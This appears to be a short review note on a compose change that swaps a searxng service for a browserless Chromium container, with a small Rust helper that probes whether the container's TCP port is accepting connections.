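The compose change drops the searxng service and adds a browserless Chromium container on host port 3003. Services that depend on it (the DAST scanner, for instance) may want a cheap readiness probe before dispatching a scan; a minimal sketch, assuming only that the port in the compose file is reachable (the helper name and timeout are hypothetical, stdlib only):

```rust
use std::net::{SocketAddr, TcpStream};
use std::time::Duration;

/// Returns true if the TCP endpoint accepts a connection within the timeout.
/// `addr` would be "127.0.0.1:3003" for the chromium service above.
fn endpoint_up(addr: &str, timeout_ms: u64) -> bool {
    addr.parse::<SocketAddr>()
        .ok()
        .map(|a| TcpStream::connect_timeout(&a, Duration::from_millis(timeout_ms)).is_ok())
        .unwrap_or(false)
}
```

An unparseable address simply yields `false`, so callers can retry in a loop without special-casing configuration errors.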